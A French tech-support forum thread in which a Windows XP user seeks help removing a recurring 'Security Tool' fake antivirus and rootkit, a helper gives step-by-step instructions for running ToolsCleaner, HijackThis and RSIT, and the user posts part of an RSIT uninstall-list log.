Virus contrôle activex+security tool+ UC 100%

furfande -  
 Utilisateur anonyme -
Bonjour,
je sais pas trop par ou commencer, il y a quelques jours, un contrôle activex c'est installé automatiquement sur un site "fiable" mais pendant le temps de chargement du site, j'apperçois un site "torrent" Avast s'exite mais ne peut virer le rootkit et le trojan ...
On m'annonce que ma license avast est perimée, IMPOSSIBLE je l'ai mise à jour dans la semaine XD

l'infection semble donc venir de mon pc même, le logiciel security tool s'installe avec des processus qui augmentent l'utilisation de RAM à 100%, des backups, les fichiers temps infectés et les fichiers drivers infectés.
Voici les actions que j'ai effectué pour nettoyer :

-Je lance directement une resto du système qui a viré security tools et a résolu la moitié des problèmes
-Ensuite, je vire mes points de resto pour eviter au virus de ce regenerer.
-je scan avec Spybot (rien)
-je scan avec Avast ( il detecte le rootkit et le spy mais en peut rien faire)
-je scan avec MBAM ( detecte entre 4 et 8 virus à chaques fois)
-je fais un log hijackthis (il m'a permis de virer le process)
-je nettoie mes fichiers temporaires et mon pc de manière générale avec TUNEUP utilities
-je vire manuellement les backups .bak du virus que j'ai pu localiser

J'ai refais des scans, tout semblait clean de partout mais le contrôle activex a recommencé à s'activer, comme par magie, je ne peux rien faire et le logiciel s'installe, même pas le temps de deco -_-
apparement il bloque même les mises à jour de windows.
Je ne vois pas comment il a pu ce regenerer, j'étais certain de l'avoir viré avec tous les scans.
Une idée ?
Visiblement, pas mal de monde à ce soucis en ce moment, aux vues des topics sur le forum securité "uc à 100%" ou encore "virus driver"
Y'a une vague de nouveaux virus ?
Enfin bref, merci d'avance à ceux qui pourront m'aider.
Configuration: Windows XP Internet Explorer 7.0

9 réponses

  1. Utilisateur anonyme
     
    Bonjour

    On reprend depuis le début.

    1)Télécharges Toolscleaner afin de supprimer les logiciels de désinfection inutiles

    ---> Télécharge Toolscleaner sur ton Bureau.
    https://www.commentcamarche.net/telecharger/securite/22061-toolscleaner/
    * Double-clique sur ToolsCleaner2.exe(ou clic droit « exécuter en tant que administrateur » pour Vista)pour le lancer.
    * Clique sur Recherche et laisse le scan agir.
    * Clique sur Suppression pour finaliser.
    * Tu peux, si tu le souhaites, te servir des Options Facultatives.
    * Clique sur Quitter pour obtenir le rapport.
    * Poste le rapport (TCleaner.txt) qui se trouve à la racine de ton disque dur (C:\).

    2)a) Télécharge et installe le logiciel HijackThis :

    https://www.commentcamarche.net/telecharger/securite/11747-hijackthis/
    ou ici http://www.trendsecure.com/portal/en-US/_download/HJTInstall.exe
    ou ici https://www.clubic.com/telecharger-fiche17891-hijackthis.html

    -->Clique sur le setup pour lancer l'installation : laisse toi guider et ne modifie pas les paramètres d'installation .
    A la fin de l’installation, le programme se lance automatiquement : ferme le en cliquant sur la croix rouge.
    Au final, tu dois avoir un raccourci sur ton bureau et aussi un cheminement comme :
    "C:\ program files\Trend Micro\HijackThis\HijackThis.exe " .

    (Ne lance pas ce prg pour l'instant et fais la suite ... )

    b) Télécharge Random's System Information Tool (RSIT) de random/random et enregistre l'exécutable sur ton Bureau.

    -> http://images.malwareremoval.com/random/RSIT.exe

    ! Déconnecte toi et ferme toutes tes applications en cours !

    Double-clique sur " RSIT.exe " pour le lancer.

    Clic droit sous VISTA (exécuter en tant que…)

    -> Une première fenêtre s'ouvre avec en titre : " Disclaimer of warranty " .

    * Devant l'option "List files/folders created ..." , tu choisis : 2 months

    * clique ensuite sur " Continue " pour lancer l'analyse ...

    -> laisse faire le scan et ne touche pas au PC ...

    Lorsque l'analyse sera terminée, deux fichiers texte s'ouvriront (probablement avec le bloc-notes).

    Poste le contenu de " log.txt " (c'est celui qui apparaît à l'écran), ainsi que de " info.txt " (que tu verras dans la barre des tâches), pour analyse et attends la suite ...

    Important : poste un rapport, puis l'autre dans la réponse suivante ...
    Si tu essaies de poster les deux en même temps, cela risque d'être trop long pour le forum ...
    ( Et si "log.txt" seul, ne passe pas non plus , fais le en 2 fois ... merci ... )

    ( Note : les rapports seront en outre sauvegardés dans ce dossier -> C:\rsit

    Poste les rapports au fur et à mesure ;merci

    @+
    0
  2. furfande
     
    Bonsoir, tout d'abord merci d'avoir pris le temps de chercher une solution ^^
    avant de poster les rapports j'ai une question: es-ce possible que le virus s'attaque à mes peripheriques ?
    Depuis quelques jours, certains péripheriques système ne fonctionnent plus d'après le gestionnaire de péripheriques, j'ai pu corriger certains mais c'est chiant à la fin.

    Rapport toolscleaner :
    (j'ai mal quitté, j'ai pas eu de log mais il a suprimmé Hijackthis et ses raccouris seulement -_-)

    Rapport RSIT info.txt :
    info.txt logfile of random's system information tool 1.06 2010-01-17 19:06:35

    ======Uninstall list======

    -->C:\Program Files\InstallShield Installation Information\{FFF8B41E-FB72-4F03-B67E-DB2D5163694D}\{00ABCDEF-2006-0000-0000-B60040153000}\setup.exe -runfromtemp -l0x040c -removeonly
    -->C:\WINDOWS\IsUn040c.exe -fC:\WINDOWS\orun32.isu
    -->MsiExec /X{74224F8D-4A17-4816-9EDB-7BB854DE532C}
    -->rundll32.exe setupapi.dll,InstallHinfSection DefaultUninstall 132 C:\WINDOWS\INF\PCHealth.inf
    µTorrent-->"C:\Program Files\uTorrent\uTorrent.exe" /UNINSTALL
    Activation Assistant for the 2007 Microsoft Office suites-->"C:\Documents and Settings\All Users\Application Data\{174892B1-CBE7-44F5-86FF-AB555EFD73A3}\Microsoft Office Activation Assistant.exe" REMOVE=TRUE MODIFY=FALSE
    Adobe AIR-->c:\Program Files\Fichiers communs\Adobe AIR\Versions\1.0\Resources\Adobe AIR Updater.exe -arp:uninstall
    Adobe AIR-->MsiExec.exe /I{A2BCA9F1-566C-4805-97D1-7FDC93386723}
    Adobe Anchor Service CS4-->MsiExec.exe /I{1618734A-3957-4ADD-8199-F973763109A8}
    Adobe Flash Player 10 ActiveX-->C:\WINDOWS\system32\Macromed\Flash\uninstall_activeX.exe
    Adobe Flash Player 10 Plugin-->C:\WINDOWS\system32\Macromed\Flash\uninstall_plugin.exe
    Adobe Photoshop CS4-->C:\Program Files\Fichiers communs\Adobe\Installers\faf656ef605427ee2f42989c3ad31b8\Setup.exe --uninstall=1
    Adobe Reader 7.0.8-->MsiExec.exe /I{AC76BA86-7AD7-1033-7B44-A70800000002}
    Adobe Setup-->MsiExec.exe /I{0D67A4E4-5BE0-4C9A-8AD8-AB552B433F23}
    Adobe Shockwave Player 11-->C:\WINDOWS\system32\adobe\SHOCKW~1\UNWISE.EXE C:\WINDOWS\system32\Adobe\SHOCKW~1\Install.log
    Antidote RX v7-->MsiExec.exe /X{A474EA56-5DBD-4181-8230-806A4762EA7F}
    Archiveur WinRAR-->C:\Program Files\WinRAR\uninstall.exe
    ArmA 2 Uninstall-->C:\Program files\Bohemia Interactive\ArmA 2\UnInstall.exe
    Assist TOSHIBA-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\engine\6\INTEL3~1\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{12B3A009-A080-4619-9A2A-C6DB151D8D67}\Setup.exe" -l0x40c
    Assistant de connexion Windows Live-->MsiExec.exe /I{D3116CC7-24DC-4CA3-9CE1-23FED836E9F2}
    ATI - Utilitaire de désinstallation du logiciel-->C:\Program Files\ATI Technologies\UninstallAll\AtiCimUn.exe
    ATI Catalyst Control Center-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\09\01\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{055EE59D-217B-43A7-ABFF-507B966405D8}\setup.exe" -l0x0
    ATI Display Driver-->rundll32 C:\WINDOWS\system32\atiiiexx.dll,_InfEngUnInstallINFFile_RunDLL@16 -force_restart -flags:0x2010001 -inf_class:DISPLAY -clean
    ATI Parental Control & Encoder-->MsiExec.exe /I{36CDA33B-909B-4719-97D1-C4B99309BDC7}
    avast! Antivirus-->C:\Program Files\Alwil Software\Avast4\aswRunDll.exe "C:\Program Files\Alwil Software\Avast4\Setup\setiface.dll",RunSetup
    AviSynth 2.5-->"C:\Program Files\AviSynth 2.5\Uninstall.exe"
    Battlefield 2(TM)-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\10\50\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{04858915-9F49-4B2A-AED4-DC49A7DE6A7B}\setup.exe" -l0x40c -removeonly
    Battlestations: Pacific-->MsiExec.exe /I{BBAB6D5D-1DD4-4D46-B5D9-121DCAB17DEC}
    Bluesoleil 6.2.227.11-->MsiExec.exe /X{679068CA-C9E9-4C22-A90D-2C4F2881EF9C}
    Bluetooth Monitor 4-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\10\50\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{61539202-097E-487E-9237-B291AB56D54C}\setup.exe" -l0x9 -removeonly
    Brothers in Arms: Hell's Highway-->C:\Program Files\Ubisoft\Gearbox Software\Brothers in Arms - Hell's Highway\Binaries\uninst.exe
    Call of Duty Modern Warfare 2-->"C:\Program Files\Call of Duty Modern Warfare 2\unins000.exe"
    Call of Duty(R) - World at War(TM) 1.1 Patch-->C:\Program Files\InstallShield Installation Information\{AFAE2B15-89A0-4215-A030-F7B5B478886B}\setup.exe -runfromtemp -l0x0409
    Call of Duty(R) - World at War(TM) 1.2 Patch-->C:\Program Files\InstallShield Installation Information\{2BF0AE92-C3BC-4112-9066-1546342B1FAE}\setup.exe -runfromtemp -l0x0409
    Call of Duty(R) - World at War(TM) 1.3 Patch-->C:\Program Files\InstallShield Installation Information\{149464D9-B06F-4505-9968-FD1206F67AD3}\setup.exe -runfromtemp -l0x0409
    Call of Duty(R) - World at War(TM) 1.4 Patch-->C:\Program Files\InstallShield Installation Information\{9F01A67B-7D67-482F-9D4F-D5980A440FD4}\setup.exe -runfromtemp -l0x0409
    Call of Duty(R) - World at War(TM) 1.5 Patch-->C:\Program Files\InstallShield Installation Information\{C3DC2DF5-EFAC-4055-9010-31F7C545DD9E}\setup.exe -runfromtemp -l0x0409
    Call of Duty(R) - World at War(TM) 1.6 Patch-->C:\Program Files\InstallShield Installation Information\{064DC64E-7A2F-4FDF-B598-E3C0747BBB9C}\setup.exe -runfromtemp -l0x0409
    Call of Duty(R) - World at War(TM) 1.7 Patch-->C:\Program Files\InstallShield Installation Information\{750C87B8-AF19-4C3C-B791-50D9C83AE572}\setup.exe -runfromtemp -l0x0409
    Call of Duty(R) - World at War(TM)-->C:\Program Files\InstallShield Installation Information\{D80A6A73-E58A-4673-AFF5-F12D7110661F}\setup.exe -runfromtemp -l0x040c
    Call of Duty(R) 4 - Modern Warfare(TM)-->C:\Program Files\InstallShield Installation Information\{E48469CC-635E-4FD5-A122-1497C286D217}\setup.exe -runfromtemp -l0x040c
    Call of Duty: Modern Warfare 2 - Multiplayer-->"C:\Program Files\Steam\steam.exe" steam://uninstall/10190
    Camera Assistant Software for Toshiba-->C:\Program Files\InstallShield Installation Information\{37C866E4-AA67-4725-9E95-A39968DD7960}\setup.exe -runfromtemp -l0x040c
    CamStudio 2.0 Fr-->"C:\Program Files\CamStudio\unins000.exe"
    Catalyst Control Center - Branding-->MsiExec.exe /I{98F91AF3-74BB-46E3-A9B7-48EED309C3C2}
    Chicken Invaders 3 Christmas Edition-->"C:\Program Files\Chicken Invaders 3 Christmas Edition\ReflexiveArcade\unins000.exe"
    Company of Heroes-->MsiExec.exe /X{51D718D1-DA81-4FAD-919F-5C1CE3C33379}
    Cool Beans NFO Creator 2.0.1.3-->"C:\Program Files\Cool Beans NFO Creator\unins000.exe"
    Correctif pour Windows XP (KB952287)-->"C:\WINDOWS\$NtUninstallKB952287$\spuninst\spuninst.exe"
    Crysis WARHEAD(R)-->"C:\Documents and Settings\All Users\Application Data\{0691F710-1ECA-4B5A-9727-25554F1BFDC6}\setup.exe" REMOVE=TRUE MODIFY=FALSE
    Crysis WARHEAD(R)-->C:\Documents and Settings\All Users\Application Data\{0691F710-1ECA-4B5A-9727-25554F1BFDC6}\setup.exe
    Crysis(R)-->MsiExec.exe /I{000E79B7-E725-4F01-870A-C12942B7F8E4}
    DAEMON Tools Toolbar-->C:\Program Files\DAEMON Tools Toolbar\uninst.exe
    DH Mobility Modder.NET-->C:\Program Files\MobilityDotNET\Uninstall.exe
    EA Download Manager-->C:\PROGRA~1\FICHIE~1\INSTAL~1\Driver\11\INTEL3~1\IDriver.exe /M{EF7E931D-DC84-471B-8DB6-A83358095474} /l1036
    EA Download Manager-->C:\Program Files\Electronic Arts\EADM\Uninstall.exe
    eMule-->"C:\Program Files\eMule\Uninstall.exe"
    EVEREST Ultimate Edition v5.30-->"C:\Program Files\Lavalys\EVEREST Ultimate Edition\unins000.exe"
    Fallout 3-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\11\00\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{974C4B12-4D02-4879-85E0-61C95CC63E9E}\setup.exe" -l0x9 -removeonly
    Far Cry 2-->"C:\Program Files\InstallShield Installation Information\{F2835483-37F2-4123-B4FE-0E77D58447F2}\setup.exe" -runfromtemp -l0x040c -removeonly
    FileZilla Client 3.2.8.1-->C:\Program Files\FileZilla FTP Client\uninstall.exe
    Free Download Manager 3.0-->"C:\Program Files\Free Download Manager\unins000.exe"
    Gestion d'énergie TOSHIBA-->C:\Program Files\InstallShield Installation Information\{8F7AC250-4D7D-431D-AC4E-94FB78EA3F8B}\setup.exe -runfromtemp -l0x040c -uninst -removeonly
    Google Toolbar for Internet Explorer-->MsiExec.exe /I{DBEA1034-5882-4A88-8033-81C4EF0CFA29}
    Google Toolbar for Internet Explorer-->regsvr32 /u /s "c:\program files\google\googletoolbar1.dll"
    Grand Theft Auto IV-->"C:\Program Files\InstallShield Installation Information\{579BA58C-F33D-4970-9953-B94B43768AC3}\setup.exe" -runfromtemp -l0x040c -removeonly
    GTA San Andreas-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\10\50\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{D417C96A-FCC7-4590-A1BB-FAF73F5BC98E}\setup.exe" -l0x40c -removeonly
    Half-Life 2: Episode Two-->"C:\Program Files\Steam\steam.exe" steam://uninstall/420
    Halo 2 for Windows Vista-->C:\Program Files\Microsoft Games\Halo 2\StartUp.exe /tnp:/remove
    HijackThis 2.0.2-->"C:\Program Files\Trend Micro\HijackThis\HijackThis.exe" /uninstall
    Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)-->C:\WINDOWS\system32\msiexec.exe /package {CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9} /uninstall /qb+ REBOOTPROMPT=""
    Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)-->C:\WINDOWS\system32\msiexec.exe /package {CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9} /uninstall {A7EEA2F2-BFCD-4A54-A575-7B81A786E658} /qb+ REBOOTPROMPT=""
    HP Customer Participation Program 7.0-->C:\Program Files\HP\Digital Imaging\ExtCapUninstall\hpzscr01.exe -datfile hpqhsc01.dat
    HP Document Viewer 7.0-->C:\Program Files\HP\Digital Imaging\DocumentViewer\hpzscr01.exe -datfile hpqbud04.dat
    HP Imaging Device Functions 7.0-->C:\Program Files\HP\Digital Imaging\DeviceManagement\hpzscr01.exe -datfile hpqbud01.dat
    HP Photosmart Premier Software 6.5-->C:\Program Files\HP\Digital Imaging\uninstall\hpzscr01.exe -datfile hpqscr01.dat
    HP Photosmart, Officejet and Deskjet 7.0.A-->C:\Program Files\HP\Digital Imaging\{BDBE2F3E-42DB-4d4a-8CB1-19BA765DBC6C}\setup\hpzscr01.exe -datfile hposcr11.dat
    HP Product Assistant-->MsiExec.exe /I{36FDBE6E-6684-462B-AE98-9A39A1B200CC}
    HP Solution Center 7.0-->C:\Program Files\HP\Digital Imaging\eSupport\hpzscr01.exe -datfile hpqbud05.dat
    HP Update-->MsiExec.exe /X{FE57DE70-95DE-4B64-9266-84DA811053DB}
    ImgBurn 2.3.2.0 Fr-->"C:\Program Files\ImgBurn\unins000.exe"
    Installation Windows Live-->C:\Program Files\Windows Live\Installer\wlarp.exe
    Installation Windows Live-->MsiExec.exe /I{46ABBC54-1872-4AA3-95E2-F2C063A63F31}
    Intel(R) Graphics Media Accelerator Driver-->C:\WINDOWS\system32\igxpun.exe -uninstall
    Intel(R) Matrix Storage Manager-->C:\WINDOWS\System32\Imsmudlg.exe
    InterVideo WinDVD for TOSHIBA-->"C:\Program Files\InstallShield Installation Information\{91810AFC-A4F8-4EBA-A5AA-B198BBC81144}\setup.exe" REMOVEALL
    Java(TM) 6 Update 16-->MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F83216016FF}
    Java(TM) 6 Update 3-->MsiExec.exe /I{3248F0A8-6813-11D6-A77B-00B0D0160030}
    K-Lite Codec Pack 4.6.2 (Full)-->"C:\Program Files\K-Lite Codec Pack\unins000.exe"
    Lecteur Windows Media 11-->"C:\Program Files\Windows Media Player\Setup_wm.exe" /Uninstall
    Left 4 Dead 2-->"C:\Program Files\Steam\steam.exe" steam://uninstall/550
    Logitech Gaming Software 5.08-->MsiExec.exe /X{33BC9D7E-E790-495E-A4EA-CFB160C17A91}
    Ma-Config.com-->MsiExec.exe /X{6240A334-46DA-453D-B8F7-C7AB8448CCE4}
    Macromedia Flash Player-->MsiExec.exe /X{0456ebd7-5f67-4ab6-852e-63781e3f389c}
    Malwarebytes' Anti-Malware-->"C:\Program Files\Malwarebytes' Anti-Malware\unins000.exe"
    Manuels TOSHIBA-->C:\Program Files\InstallShield Installation Information\{5B1DD5AA-FF34-4D6E-A912-CB46BB7378DC}\setup.exe -runfromtemp -l0x040c -removeonly
    MediaInfo 0.7.19-->C:\Program Files\MediaInfo\uninst.exe
    Mega Manager-->C:\Program Files\InstallShield Installation Information\{3B6E3FC6-274C-4B6C-BC85-5C3B15DE18E2}\setup.exe -runfromtemp -l0x0009 -removeonly
    Microsoft .NET Framework 1.1 French Language Pack-->MsiExec.exe /X{9A394342-4A68-4EBA-85A6-55B559F4E700}
    Microsoft .NET Framework 1.1 Security Update (KB953297)-->"C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Updates\hotfix.exe" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Updates\M953297\M953297Uninstall.msp"
    Microsoft .NET Framework 1.1-->MsiExec.exe /X{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}
    Microsoft .NET Framework 2.0 Service Pack 2-->MsiExec.exe /I{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}
    Microsoft .NET Framework 3.0 Service Pack 2-->MsiExec.exe /I{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}
    Microsoft .NET Framework 3.5 SP1-->C:\WINDOWS\Microsoft.NET\Framework\v3.5\Microsoft .NET Framework 3.5 SP1\setup.exe
    Microsoft .NET Framework 3.5 SP1-->MsiExec.exe /I{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}
    Microsoft Choice Guard-->MsiExec.exe /X{F0E12BBA-AD66-4022-A453-A1C8A0C4D570}
    Microsoft Games for Windows - LIVE -->MsiExec.exe /X{4D243BA7-9AC4-46D1-90E5-EEB88974F501}
    Microsoft Games for Windows - LIVE Redistributable-->MsiExec.exe /X{05B49229-22A2-4F88-842A-BBC2EBE1CCF6}
    Microsoft Halo-->"C:\Program Files\Microsoft Games\Halo\UNINSTAL.EXE" /runtemp /addremove
    Microsoft Internationalized Domain Names Mitigation APIs-->"C:\WINDOWS\$NtServicePackUninstallIDNMitigationAPIs$\spuninst\spuninst.exe"
    Microsoft National Language Support Downlevel APIs-->"C:\WINDOWS\$NtServicePackUninstallNLSDownlevelMapping$\spuninst\spuninst.exe"
    Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053-->MsiExec.exe /X{770657D0-A123-3C07-8E44-1C83EC895118}
    Microsoft Visual C++ 2005 Redistributable-->MsiExec.exe /X{7299052b-02a4-4627-81f2-1818da5d550d}
    Mise à jour de sécurité pour Lecteur Windows Media (KB952069)-->"C:\WINDOWS\$NtUninstallKB952069_WM9$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Lecteur Windows Media 10 (KB917734)-->"C:\WINDOWS\$NtUninstallKB917734_WMP10$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Lecteur Windows Media 10 (KB936782)-->"C:\WINDOWS\$NtUninstallKB936782_WMP10$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB938127)-->"C:\WINDOWS\ie7updates\KB938127-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB938127-v2)-->"C:\WINDOWS\ie7updates\KB938127-v2-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB956390)-->"C:\WINDOWS\ie7updates\KB956390-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB958215)-->"C:\WINDOWS\ie7updates\KB958215-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB960714)-->"C:\WINDOWS\ie7updates\KB960714-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 8 (KB969897)-->"C:\WINDOWS\ie8updates\KB969897-IE8\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 8 (KB971961)-->"C:\WINDOWS\ie8updates\KB971961-IE8\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 8 (KB972260)-->"C:\WINDOWS\ie8updates\KB972260-IE8\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 8 (KB974455)-->"C:\WINDOWS\ie8updates\KB974455-IE8\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 8 (KB976325)-->"C:\WINDOWS\ie8updates\KB976325-IE8\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB938464)-->"C:\WINDOWS\$NtUninstallKB938464$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB946648)-->"C:\WINDOWS\$NtUninstallKB946648$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB950762)-->"C:\WINDOWS\$NtUninstallKB950762$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB950974)-->"C:\WINDOWS\$NtUninstallKB950974$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB951066)-->"C:\WINDOWS\$NtUninstallKB951066$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB951376-v2)-->"C:\WINDOWS\$NtUninstallKB951376-v2$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB951698)-->"C:\WINDOWS\$NtUninstallKB951698$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB951748)-->"C:\WINDOWS\$NtUninstallKB951748$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB952954)-->"C:\WINDOWS\$NtUninstallKB952954$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB954211)-->"C:\WINDOWS\$NtUninstallKB954211$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB954600)-->"C:\WINDOWS\$NtUninstallKB954600$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB955069)-->"C:\WINDOWS\$NtUninstallKB955069$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB956802)-->"C:\WINDOWS\$NtUninstallKB956802$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB956803)-->"C:\WINDOWS\$NtUninstallKB956803$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB956841)-->"C:\WINDOWS\$NtUninstallKB956841$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB957095)-->"C:\WINDOWS\$NtUninstallKB957095$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB957097)-->"C:\WINDOWS\$NtUninstallKB957097$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB958644)-->"C:\WINDOWS\$NtUninstallKB958644$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB958687)-->"C:\WINDOWS\$NtUninstallKB958687$\spuninst\spuninst.exe"
    Mise à jour pour Windows Internet Explorer 8 (KB968220)-->"C:\WINDOWS\ie8updates\KB968220-IE8\spuninst\spuninst.exe"
    Mise à jour pour Windows Internet Explorer 8 (KB976749)-->"C:\WINDOWS\ie8updates\KB976749-IE8\spuninst\spuninst.exe"
    Module de prise en charge linguistique de Microsoft .NET Framework 2.0 - FRA-->C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Microsoft .NET Framework 2.0 Language Pack - FRA\install.exe
    Mozilla Firefox (3.0.12)-->C:\Program Files\Mozilla Firefox\uninstall\helper.exe
    MSVCRT-->MsiExec.exe /I{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}
    MSXML 4.0 SP2 (KB927978)-->MsiExec.exe /I{37477865-A3F1-4772-AD43-AAFC6BCFF99F}
    MSXML 4.0 SP2 (KB936181)-->MsiExec.exe /I{C04E32E0-0416-434D-AFB9-6969D703A9EF}
    MSXML 4.0 SP2 (KB954430)-->MsiExec.exe /I{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}
    MSXML 4.0 SP2 (KB973688)-->MsiExec.exe /I{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}
    MSXML 4.0 SP2 Parser and SDK-->MsiExec.exe /I{716E0306-8318-4364-8B8F-0CC4E9376BAC}
    MSXML 4.0 SP3 Parser (KB973685)-->MsiExec.exe /I{859DFA95-E4A6-48CD-B88E-A3E483E89B44}
    MSXML 4.0 SP3 Parser-->MsiExec.exe /I{196467F1-C11F-4F76-858B-5812ADC83B94}
    MSXML 6 Service Pack 2 (KB954459)-->MsiExec.exe /I{97AA1F3C-DD64-4AA6-AEC5-F8F9F4CC21C5}
    NHL® 09-->MsiExec.exe /X{F2B5A2A7-2DF9-4361-8BD5-362714528B51}
    Nokia Connectivity Cable Driver-->MsiExec.exe /X{C3F19A5F-35A8-4FDB-A6ED-0F4CE398DA48}
    Notepad++-->C:\Program Files\Notepad++\uninstall.exe
    NVIDIA PhysX v8.04.25-->MsiExec.exe /X{74224F8D-4A17-4816-9EDB-7BB854DE532C}
    OCR Software by I.R.I.S 7.0-->C:\Program Files\HP\Digital Imaging\OCR\hpzscr01.exe -datfile hpqbud11.dat
    OpenMG Limited Patch 4.7-07-14-05-01-->C:\Program Files\Fichiers communs\Sony Shared\OpenMG\HotFixes\HotFix4.7-07-14-05-01\HotFixSetup\setup.exe /u
    OpenMG Secure Module 4.7.00-->C:\PROGRA~1\FICHIE~1\INSTAL~1\Driver\1150\INTEL3~1\IDriver.exe /M{CCD663AE-610D-4BDF-AAB0-E914B044527D} UNINSTALL
    OpenOffice.org 3.1-->MsiExec.exe /I{0FA44E79-CD7D-4E8D-A2EE-26FE05F509B6}
    OpenSSL 0.9.6m-->C:\OpenSSL\unins000.exe
    Outil de téléchargement Windows Live-->MsiExec.exe /I{205C6BDD-7B73-42DE-8505-9A093F35A238}
    Package de pilotes Windows - Nokia pccsmcfd (08/22/2008 7.0.0.0)-->C:\PROGRA~1\DIFX\270581355A767BF1\dpinst.exe /u C:\WINDOWS\system32\DRVSTORE\pccsmcfd_A3B3916E5D8138F59EE218321B27B044D3B18294\pccsmcfd.inf
    Patch Français-->"C:\Program Files\Half Life 2 Episode Two\fdf\unins000.exe"
    PC Connectivity Solution-->MsiExec.exe /I{83258E90-1F76-4E13-9F60-A0F8ED41E76F}
    Presto! BizCard 5 SE (Version Française)-->"C:\Program Files\InstallShield Installation Information\{FFF8B41E-FB72-4F03-B67E-DB2D5163694D}\setup.exe" -runfromtemp -l0x040c -uninst -removeonly
    PunkBuster Services-->C:\WINDOWS\system32\pbsvc.exe -u
    REALTEK GbE & FE Ethernet PCI-E NIC Driver-->C:\Program Files\InstallShield Installation Information\{C9BED750-1211-4480-B1A5-718A3BE15525}\setup.exe -runfromtemp -removeonly
    Realtek High Definition Audio Driver-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\11\50\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}\Setup.exe" -l0x40c -removeonly
    Réducteur de bruit lect. CD/DVD-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\engine\6\INTEL3~1\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{9FE35071-CAB2-4E79-93E7-BFC6A2DC5C5D}\Setup.exe" -l0x40c
    Return to Castle Wolfenstein-->"C:\Program Files\Steam\steam.exe" steam://uninstall/9010
    RICOH R5C83x/84x Flash Media Controller Driver Ver.3.51.01-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\0701\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{59F6A514-9813-47A3-948C-8A155460CC2A}\setup.exe" -l0x40c anything
    Rockstar Games Social Club-->"C:\Program Files\InstallShield Installation Information\{08B3869E-D282-424C-9AFC-870E04A4BA14}\setup.exe" -runfromtemp -l0x040c -removeonly
    Segoe UI-->MsiExec.exe /I{A1F66FC9-11EE-4F2F-98C9-16F8D1E69FB7}
